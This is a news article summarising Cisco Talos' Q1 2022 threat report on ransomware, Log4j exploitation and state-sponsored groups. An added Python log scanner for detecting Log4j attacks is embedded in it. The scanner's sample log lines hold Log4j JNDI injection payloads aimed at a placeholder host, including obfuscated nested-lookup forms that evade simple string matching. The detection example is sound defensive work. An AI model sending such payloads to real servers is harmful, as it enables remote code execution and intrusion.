Extortion Diversity, Personal Goals
The Cisco Talos Incident Response (CTIR) team still sees ransomware at the forefront of cybercriminals’ activities in the first quarter of 2022. Cisco Talos is one of the world’s leading threat research units, which is currently also helping with Ukraine’s cyber defense. The quarterly report deals, among other things, with the ongoing exploitation of the Log4j vulnerability and the increase in APT attacks.
- Extortion remains: Ransomware is still the biggest threat
- Diversity is coming: No ransomware family was observed twice in the ransomware attacks
- Personal goals: There were also more threats using social engineering techniques than ever before
The Cisco Talos Incident Response (CTIR) team, backed by the world’s largest commercial threat intelligence organization, has released its quarterly Threat Assessment Report for the first quarter of 2022. According to the report, ransomware is still the biggest threat, continuing the trend seen every quarter since 2020. The first quarter of 2022 also brought an increase in engagements involving advanced persistent threats (APTs). These included activity by MuddyWater, an APT sponsored by the Iranian state, and by Mustang Panda, which is attributed to China; the latter uses USB drives to distribute the PlugX remote access Trojan (RAT). A suspected Chinese actor known as “Deep Panda” exploited the Log4j vulnerability.
As in previous quarters, telecommunications was one of the most frequently attacked sectors, followed closely by organizations in education and public administration.
Interestingly, no ransomware family was observed twice in the ransomware attacks of the first quarter of 2022, a sign of greater heterogeneity among ransomware attackers that Cisco Talos had already observed last year. New ransomware families also appeared this quarter, including Cerber (also known as CerberImposter), Entropy and Cuba, alongside high-profile families such as Hive and Conti. According to the CTIR team’s analysis, ransomware attackers again exfiltrated sensitive data this quarter in order to carry out double extortion, a trend that has been evident since the winter of 2019.
In a Cerber ransomware incident involving a holding company, the attacker exploited vulnerabilities in GitLab to upload and execute code remotely, ultimately gaining access to the system in the context of the “git” account. This matches reports from other security companies about a new version of Cerber ransomware targeting Atlassian Confluence and GitLab servers with older RCE vulnerabilities.
Exploitation of Log4j was the second most common threat vector after ransomware. The Apache logging library is used by companies around the world. In January 2022, the CTIR team observed growing activity in which attackers attempted to exploit Log4j in vulnerable VMware Horizon servers.
In most attacks, the initial vector could not be identified, owing to shortcomings in logging and visibility. In the engagements where the original vector could be confirmed, or at least reasonably inferred, attackers had exploited publicly accessible applications vulnerable to Log4j.
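The visibility gap described above is often a matter of not looking at the right data: a JNDI lookup string sent against a vulnerable Log4j application usually lands in a web access log (commonly in the User-Agent or a request parameter), and attackers split the literal text with nested lookups so that a plain substring search misses it. The following Python scanner is an added example, not part of the Talos report or this article: it collapses the common nested wrappers and flags lines that contain a JNDI lookup, reporting the scheme (ldap, rmi, dns) for triage. The log lines, IP addresses and the `c2.example.invalid` hostname are constructed for the example; the `.invalid` domain is reserved and never resolves.

```python
import re
from typing import Dict, List, Optional

# Constructed sample web-server access log lines (hypothetical; not taken from
# the Talos report). Hostnames use the reserved .invalid top-level domain.
SAMPLE_LOG_LINES: List[str] = [
    '10.0.0.5 - - [12/Jan/2022:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Jan/2022:10:01:05 +0000] "GET /login HTTP/1.1" 200 311 "-" "${jndi:ldap://c2.example.invalid/a}"',
    '10.0.0.9 - - [12/Jan/2022:10:01:07 +0000] "GET /login HTTP/1.1" 200 311 "-" "${${lower:j}ndi:rmi://c2.example.invalid/b}"',
    '10.0.0.9 - - [12/Jan/2022:10:01:09 +0000] "GET /login HTTP/1.1" 200 311 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://c2.example.invalid/c}"',
    '10.0.0.7 - - [12/Jan/2022:10:02:00 +0000] "POST /api HTTP/1.1" 204 0 "-" "curl/7.68.0"',
]

# Two wrapper forms that Log4j resolves to a single character and that are
# used to split the literal "jndi" so a naive substring match misses it:
#   ${lower:j} / ${upper:J}   -> case-conversion lookups
#   ${::-j} / ${env:X:-j}     -> lookups whose default value follows ":-"
_CASE_WRAP = re.compile(r"\$\{(?:lower|upper):([A-Za-z])\}")
_DEFAULT_WRAP = re.compile(r"\$\{[^{}]*?:-([A-Za-z])\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize_lookups(text: str, max_rounds: int = 10) -> str:
    """Collapse nested lookup wrappers, innermost first, until nothing changes."""
    for _ in range(max_rounds):
        collapsed = _CASE_WRAP.sub(lambda m: m.group(1), text)
        collapsed = _DEFAULT_WRAP.sub(lambda m: m.group(1), collapsed)
        if collapsed == text:
            break
        text = collapsed
    return text


def scan_line(line: str) -> Optional[Dict[str, str]]:
    """Return a finding for one log line, or None if no JNDI lookup is present."""
    normalized = normalize_lookups(line)
    match = _JNDI.search(normalized)
    if match is None:
        return None
    # The scheme after "jndi:" (ldap, rmi, dns, ...) helps prioritise triage.
    scheme_match = re.match(r"\s*([A-Za-z]+)", normalized[match.end():])
    return {
        "scheme": scheme_match.group(1).lower() if scheme_match else "",
        "normalized": normalized[match.start():match.start() + 64],
        "raw": line,
    }


def scan_log(lines: List[str]) -> List[Dict[str, str]]:
    """Scan many lines and keep only those containing a JNDI lookup."""
    findings = []
    for line in lines:
        finding = scan_line(line)
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG_LINES):
        print(f"[{finding['scheme']}] {finding['normalized']}")
```

Run against the constructed lines, the scanner flags the three requests from 10.0.0.9 and leaves the two benign lines alone. The normalization step is what makes the difference: the second and third flagged lines contain no literal "jndi" at all, so a log search for that string would have missed them, which is one concrete way the "shortcomings in logging and visibility" the report describes show up in practice.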
“Many of these attacks could have been prevented,” says Holger Unterbrink, Technical Leader of Cisco Talos in Germany. “Based on the attacks studied, we strongly recommend multi-factor authentication for all major services, especially endpoint detection response solutions.”
The CTIR team has compiled further findings:
- Phishing attacks using a malicious link or document continued to increase, and threats using social engineering techniques rose to a new high. Phishing tools were increasingly well disguised as legitimate files or utilities.
- The CTIR team saw an increase in techniques targeting unpatched, publicly accessible applications.
- Compared with previous quarters, there was a sharp increase in activity aimed at evading defenses and collecting data. Attackers were interested in details about specific hosts, keylogging to harvest credentials, and selecting files for later exfiltration in support of multiple extortion.
- As in the previous quarter, utilities such as PsExec and Cobalt Strike, as well as remote access software, were commonly used in attacks.